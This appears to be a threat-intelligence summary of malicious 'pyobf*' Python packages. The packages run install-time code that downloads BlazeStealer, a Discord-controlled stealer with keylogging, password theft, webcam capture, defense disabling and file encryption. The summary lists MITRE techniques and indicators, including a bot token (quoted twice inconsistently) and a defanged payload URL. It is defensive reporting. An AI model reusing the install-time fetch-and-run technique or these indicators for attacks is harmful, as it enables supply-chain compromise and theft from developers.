Threat Research

Python obfuscation traps

CTI

Attackers published malicious Python packages masquerading as obfuscation tools that execute code at install time and fetch a secondary payload called BlazeStealer. The payload runs a Discord-based remote-access bot that enables data theft, keylogging, webcam capture, file encryption, and disabling of defenses. #BlazeStealer #pyobfgood

Keypoints

  • Multiple fake Python obfuscation packages (names beginning with “pyobf”, e.g., pyobfgood) were uploaded to the Python ecosystem and install malicious code.
  • The packages contain code in setup.py and __init__.py that executes during installation and downloads additional Python code from an external server.
  • The fetched payload, dubbed BlazeStealer, runs as a Discord bot (token exposed) and provides attackers with full remote control of the host.
  • BlazeStealer capabilities include exfiltrating system info, stealing Chrome passwords, installing a keylogger, downloading files, capturing screenshots/screen audio, and webcam photo capture via a downloaded utility.
  • Attackers can also disable Windows Defender/Task Manager, force high CPU or BSOD, add startup scripts, execute arbitrary commands, and encrypt files (ransom potential).
  • Developers who perform obfuscation are high-value targets because they often handle sensitive code and secrets.
  • IOCs published include the Discord token, transfer.sh payload URL, and the WebCamImageSave download URL.

MITRE Techniques

  • [T1195] Supply Chain Compromise – Malicious packages were published to the Python ecosystem that execute code during installation (“…setup.py and init.py files of the package contain a script that is activated upon package installation which receives and executes code from an external source”).
  • [T1105] Ingress Tool Transfer – The installer downloads and runs an additional remote Python payload (“…retrieves an additional malicious script from an external source”).
  • [T1071] Application Layer Protocol – The malware uses Discord as a C2/control channel and presents a bot token to connect (“…runs a Discord bot with the following unique identifier: “MTE2NTc2MDM5MjY5NDM1NDA2MA.GRSNK7.OHxJIpJoZxopWpFS3zy5v2g7k2vyiufQ183Lo””).
  • [T1555.003] Credentials from Web Browsers – The payload explicitly steals stored passwords from Chrome (“…Steal passwords from the Chrome web browser”).
  • [T1056.001] Input Capture: Keylogging – The malware sets up a keylogger to capture user keystrokes (“…set up a keylogger”).
  • [T1082] System Information Discovery – The actor exfiltrates detailed host information for reconnaissance (“…Exfiltrate detailed host information”).
  • [T1041] Exfiltration Over C2 Channel – Data and images are sent back to the attacker via the Discord channel and other remote endpoints (“…The resulting image is then sent back to the Discord channel”).
  • [T1547] Boot or Logon Autostart Execution – The malware adds a batch script to the startup directory to run destructive actions on boot (“…inserting a batch script in the startup directory to shut down the PC”).
  • [T1562.001] Impair Defenses: Disable or Modify Tools – The payload deactivates Windows Defender and Task Manager to avoid detection (“…Deactivate Windows Defender and Task Manager”).
  • [T1486] Data Encrypted for Impact – The malware can encrypt files, indicating ransomware-style impact (“…Encrypt files, potentially for ransom”).

Indicators of Compromise

  • [Malicious package names] package distribution – pyobfgood, pyobftoexe (and several other “pyobf*” packages).
  • [Discord bot token] C2 identifier – MTE2NTc2MDM5MjY5NDM1NDA2MA.GRSNK7.OHxJIpJoZxopWpF_S3zy5v2g7k2vyiufQ183Lo
  • [Remote payload URL] fetched installer/script – hxxps://transfer[.]sh/get/wDK3Q8WOA9/start[.]py (downloads the BlazeStealer script)
  • [Utility download URL] webcam capture tool – hxxps://www[.]nirsoft[.]net/utils/webcamimagesave.zip (used to capture webcam images and run WebCamImageSave.exe)
  • [Filename] payload and tools – start.py, WebCamImageSave.exe (and other downloaded binaries/scripts)

Malicious “pyobf*” packages embed executable code in setup.py and package __init__ that runs automatically during installation; this installer contacts a remote URL (e.g., transfer[.]sh/get/…/start.py) to download and execute a secondary Python payload. That secondary payload, BlazeStealer, connects to a Discord channel using a hardcoded bot token and uses the Discord channel as a command-and-control path, enabling remote command execution and data transfer.

Once active, BlazeStealer performs reconnaissance and collection (system information, Chrome-stored passwords), installs input-capture mechanisms (keylogger), and provides file operations (download, exfiltrate). It can capture screenshots and audio, download a zipped utility to execute WebCamImageSave.exe to take webcam photos and upload them to the attacker-controlled Discord channel, then remove downloaded artifacts to reduce traces.

For persistence and impact, the malware can add startup batch scripts, disable Windows Defender and Task Manager, ramp CPU usage, trigger a BSOD via Python, execute arbitrary commands, and encrypt files for potential ransom. Detection and mitigation should focus on blocking the listed URLs/tokens, verifying package provenance before installation, and preventing installer-time arbitrary network fetches from untrusted packages.

Read more: https://checkmarx.com/blog/python-obfuscation-traps/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint